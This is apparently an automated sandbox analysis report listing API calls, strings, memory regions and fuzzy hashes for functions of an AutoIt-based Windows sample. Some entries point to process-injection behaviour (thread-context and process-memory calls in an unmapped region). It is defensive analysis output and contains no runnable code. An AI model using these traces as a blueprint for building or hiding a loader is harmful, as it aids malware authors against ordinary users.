              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
              • String ID: <g$$\d$$%!$c$
              • API String ID: 1986988660-3339779836
              • Opcode ID: 48e712a948bcdc7a0c516c4bd8ac72abba7a2754321425ac6a28b22cdbc16850
              • Instruction ID: 0e6dfc72cb0e4cf5a98a7c333b1052dc9f86c9b547582349f9804a6e19b8c80b
              • Opcode Fuzzy Hash: 48e712a948bcdc7a0c516c4bd8ac72abba7a2754321425ac6a28b22cdbc16850
              • Instruction Fuzzy Hash: 7981CBB89113908ECBA8EF79F94C655BBE4FBABB18310817AD019C7262EB314455CF13

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01402761
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01402987
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
              • Instruction ID: cae01be14ffcfab33f5501579136ca38933d915af6f6a7a7463d69fed52d0996
              • Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
              • Instruction Fuzzy Hash: CFA12975E00209EBDB15CFA5C898FEEBBB5BF48304F20816AE501BB2D1D7B59A41CB54

              APIs
              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A15
              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A36
              • ShowWindow.USER32(00000000,?,?), ref: 00183A4A
              • ShowWindow.USER32(00000000,?,?), ref: 00183A53
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: e873e85b63087902b3e0d8fd84ef526eef2fbf2055bb6178ad2fd84f35fab916
              • Instruction ID: 3444f7355d8a2bef0dd61d2ed3aa67cc83d99347d2a5b3283a7f16131bed4463
              • Opcode Fuzzy Hash: e873e85b63087902b3e0d8fd84ef526eef2fbf2055bb6178ad2fd84f35fab916
              • Instruction Fuzzy Hash: 45F03A746802907EEB7197277C0CE273E7DE7C7F50F00002ABD00A21B1C2E60810CAB2

              APIs
                • Part of subcall function 01402300: Sleep.KERNELBASE(000001F4), ref: 01402311
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0140257D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFileSleep
              • String ID: EK9DHSXQI8X8LT2ZM8VEF0RW4N
              • API String ID: 2694422964-1628879581
              • Opcode ID: 28baef2b834099c0a3d3082542bf1d2f1ae1fc8fdce73ce96d69836baeca99d0
              • Instruction ID: ec8aa38c5e04c318b789d2d8d966a416d5a96af41b215baca8572e1d743c34de
              • Opcode Fuzzy Hash: 28baef2b834099c0a3d3082542bf1d2f1ae1fc8fdce73ce96d69836baeca99d0
              • Instruction Fuzzy Hash: 7F619530D04288DAEF12DBB4C858BDFBB74AF19304F004199E649BB2D0D7BA5B45CB66

              APIs
              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001BD5EC
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • _memset.LIBCMT ref: 0018418D
              • _wcscpy.LIBCMT ref: 001841E1
              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001841F1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
              • String ID: Line:
              • API String ID: 3942752672-1585850449
              • Opcode ID: d8c9799ac86a62febc6a6a3e1e8ac80acc5a67e81ead2e480ed00e0af1457600
              • Instruction ID: f1a017e4c18207aa9a11325b16b85b0c5b9a9cd114ea1927859078974c950738
              • Opcode Fuzzy Hash: d8c9799ac86a62febc6a6a3e1e8ac80acc5a67e81ead2e480ed00e0af1457600
              • Instruction Fuzzy Hash: 363170714083056BD725FB60EC49BDB77E8AB66310F20461AF595920E1EFB4A748CB93
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
              • Instruction ID: 86afe730399fbcae5c30d49e76b712006f0147a48b82dd49b975fd753c2498e1
              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
              • Instruction Fuzzy Hash: 7751DA79A08B05DFDB248FF9C88066E77B3AF52320F648729F839A61D0D7709D548B40
              APIs
                • Part of subcall function 00184F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184F6F
              • _free.LIBCMT ref: 001BE68C
              • _free.LIBCMT ref: 001BE6D3
                • Part of subcall function 00186BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186D0D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$CurrentDirectoryLibraryLoad
              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
              • API String ID: 2861923089-1757145024
              • Opcode ID: e168387df32ee7b125f640b69042502d1f1b81bf9431cade8298273a9e90a397
              • Instruction ID: 98b7edd0555dc5238f71942eea813c9c6e6da6e73b8a6c03a0b58fefffd4548d
              • Opcode Fuzzy Hash: e168387df32ee7b125f640b69042502d1f1b81bf9431cade8298273a9e90a397
              • Instruction Fuzzy Hash: DF915E71910219AFCF18EFA4CC919EDB7B5FF29314F14446AF816AB291EB309A15CF60
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001835A1,SwapMouseButtons,00000004,?), ref: 001835D4
              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 001835F5
              • RegCloseKey.KERNELBASE(00000000,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 00183617
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 3677997916-824357125
              • Opcode ID: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
              • Instruction ID: e01e1c98810a191f7c5b215d204f8146ea25dccff4a05ad26a7a93f62773701f
              • Opcode Fuzzy Hash: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
              • Instruction Fuzzy Hash: 59115771610208BFDB209F68EC84EBEBBB9EF04B40F258469F805D7214E3719F409BA0
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01401ABB
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01401B51
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01401B73
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
              • Instruction ID: 1a97b814b5af261bfe9d9668263babeec90bdd0dee53eb11081bfc405aac038c
              • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
              • Instruction Fuzzy Hash: 3262F930A142589BEB25CFA5C850BDEB772EF58700F1091A9D20DEB3E0E7759E81CB59
              APIs
                • Part of subcall function 00185045: _fseek.LIBCMT ref: 0018505D
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AAE
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AC1
              • _free.LIBCMT ref: 001E992C
              • _free.LIBCMT ref: 001E9933
              • _free.LIBCMT ref: 001E999E
                • Part of subcall function 001A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9C64), ref: 001A2FA9
                • Part of subcall function 001A2F95: GetLastError.KERNEL32(00000000,?,001A9C64), ref: 001A2FBB
              • _free.LIBCMT ref: 001E99A6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
              • String ID:
              • API String ID: 1552873950-0
              • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
              • Instruction ID: ed7ab2771e6fac73aa8094bde0b1f74a6f1edc34f7d2f86d60fbc0be4716181e
              • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
              • Instruction Fuzzy Hash: D35170B1D04658AFDF249F65CC81A9EBBBAEF48304F1004AEF609A7241DB715E80CF58
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
              • String ID:
              • API String ID: 2782032738-0
              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
              • Instruction ID: 2ad5d2048ecb61dbc7c1b40ab55cacaf9ac5bea50d163f11b49a17fae5f6f692
              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
              • Instruction Fuzzy Hash: A041D47D6007069FDF28CEA9C8809AF77A6EFCA364B24813DE856C7640E7B0DD508B44
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID: AU3!P/!$EA06
              • API String ID: 4104443479-2528700987
              • Opcode ID: c4107b2b7f102be84109bcc56edb8fc9644c9e0704b5ae50612e8abb02016255
              • Instruction ID: 910dbe3089e9156628afc4a0a25395985c2edf992832e40ad13075980f5928d9
              • Opcode Fuzzy Hash: c4107b2b7f102be84109bcc56edb8fc9644c9e0704b5ae50612e8abb02016255
              • Instruction Fuzzy Hash: 5B416E21A046556BDF25BB6488517BE7FA6EB15300F294065FC829B282DF294F408FA1
              APIs
              • _memset.LIBCMT ref: 001BEE62
              • GetOpenFileNameW.COMDLG32(?), ref: 001BEEAC
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
                • Part of subcall function 001A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A09F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Name$Path$FileFullLongOpen_memset
              • String ID: X
              • API String ID: 3777226403-3081909835
              • Opcode ID: 2bdc38cb4a9e4c14d142a00dd00dc6e7833dfa541045baacb1fb694d63f78c14
              • Instruction ID: 68ff8811bab552f9b2c1f3440dd13bca6805df993782a1b661a62df039dbde5f
              • Opcode Fuzzy Hash: 2bdc38cb4a9e4c14d142a00dd00dc6e7833dfa541045baacb1fb694d63f78c14
              • Instruction Fuzzy Hash: 0821C670A102589BCF11EF94C845BEE7BF99F59314F104019E408E7281DBF89A898FA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fread_nolock_memmove
              • String ID: EA06
              • API String ID: 1988441806-3962188686
              • Opcode ID: 55fcf971e4c7e85b5081864dd176f3abf88e7ec267a5e1c21da8e18a9c4b5f95
              • Instruction ID: 63d40cbb7214270dc68c6ca5611c73334057903aa295d2819e45b2d9efba5215
              • Opcode Fuzzy Hash: 55fcf971e4c7e85b5081864dd176f3abf88e7ec267a5e1c21da8e18a9c4b5f95
              • Instruction Fuzzy Hash: 5101B9719046587EDB28C7A9C856EFE7BFC9B15301F00419AF552D2181E679A6148760
              APIs
              • GetTempPathW.KERNEL32(00000104,?), ref: 001E9B82
              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 001E9B99
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Temp$FileNamePath
              • String ID: aut
              • API String ID: 3285503233-3010740371
              • Opcode ID: dfe772faf56694a35284c6bc747065f63a17188b6bdb4624d5974701a1b57353
              • Instruction ID: c3b398ddcd056f95c415f441d46ca607188fb92111c16b2214cb448138b2354a
              • Opcode Fuzzy Hash: dfe772faf56694a35284c6bc747065f63a17188b6bdb4624d5974701a1b57353
              • Instruction Fuzzy Hash: 8BD05E7958030DAFDB609B90EC0EF9A772CE704700F0042B1BF94910A2DEB065A88B91
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 803fe25308329cea950372fcb9caf0d3f761a65d27cf6d4e64391f26d6b38eeb
              • Instruction ID: 7b6ea43545d1ebd9c94e2f4f97670f21df1a3140053aa8afa310fe67eac5ed23
              • Opcode Fuzzy Hash: 803fe25308329cea950372fcb9caf0d3f761a65d27cf6d4e64391f26d6b38eeb
              • Instruction Fuzzy Hash: E7F15970A083059FC714DF28C484A6ABBE5FF88314F54896EF99A9B351DB31E945CF82
              APIs
              • _memset.LIBCMT ref: 00184401
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001844A6
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001844C3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconNotifyShell_$_memset
              • String ID:
              • API String ID: 1505330794-0
              • Opcode ID: 7f2012f8aaa3919424cecb198f4067b02e831225e16f183795a0ccada23f9d9a
              • Instruction ID: 20a467aa1f30cb3ededab6d552a6c657cd065b934a1576940592ec771ac5813d
              • Opcode Fuzzy Hash: 7f2012f8aaa3919424cecb198f4067b02e831225e16f183795a0ccada23f9d9a
              • Instruction Fuzzy Hash: 3C3175B45057019FD720EF24E888797BBF4FB59304F00092EF99A83251DBB56A44CF52
              APIs
              • __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001AA3AB: __NMSG_WRITE.LIBCMT ref: 001AA3D2
                • Part of subcall function 001AA3AB: __NMSG_WRITE.LIBCMT ref: 001AA3DC
              • __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001AA408: GetModuleFileNameW.KERNEL32(00000000,002443BA,00000104,?,00000001,00000000), ref: 001AA49A
                • Part of subcall function 001AA408: ___crtMessageBoxW.LIBCMT ref: 001AA548
                • Part of subcall function 001A32DF: ___crtCorExitProcess.LIBCMT ref: 001A32E5
                • Part of subcall function 001A32DF: ExitProcess.KERNEL32 ref: 001A32EE
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
              • String ID:
              • API String ID: 1372826849-0
              • Opcode ID: 320a6c4eeb3c328ebc157af4880647fd3d127f84aa1130da593a7b19ae505466
              • Instruction ID: 1681adbf14b7202481a0c0dd72f5c187a00eccaca319c6a0d0ff81ea1e9174af
              • Opcode Fuzzy Hash: 320a6c4eeb3c328ebc157af4880647fd3d127f84aa1130da593a7b19ae505466
              • Instruction Fuzzy Hash: AD01D23D248B11DEE7257B64E846B6F725A9F63778F51002AF500AE181DB709D018660
              APIs
              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001E97D2,?,?,?,?,?,00000004), ref: 001E9B45
              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 001E9B5B
              • CloseHandle.KERNEL32(00000000,?,001E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001E9B62
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: File$CloseCreateHandleTime
              • String ID:
              • API String ID: 3397143404-0
              • Opcode ID: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
              • Instruction ID: 872b18c9235e13be5e0383ec5e4255b7e9bcdb6c60610048bdca9d92da8392ea
              • Opcode Fuzzy Hash: ea19937d0e69787a46e00ce508db6aae3273cda4e13dc8274ead11466b72efda
              • Instruction Fuzzy Hash: 9DE086321C0314B7D7311B54FC0DFCE7B18AB05B71F104120FB14690E187B1251197D8
              APIs
              • _free.LIBCMT ref: 001E8FA5
                • Part of subcall function 001A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9C64), ref: 001A2FA9
                • Part of subcall function 001A2F95: GetLastError.KERNEL32(00000000,?,001A9C64), ref: 001A2FBB
              • _free.LIBCMT ref: 001E8FB6
              • _free.LIBCMT ref: 001E8FC8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
              • Instruction ID: 9b80c890b62414c8573ae6446ee80d216c951f2f6fbe671011e0b00b8c3a2fff
              • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
              • Instruction Fuzzy Hash: D3E017A1709B414ECA24A67EAD40A9B67EE5F89360B18081EF80EDB182DF34EC418128
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
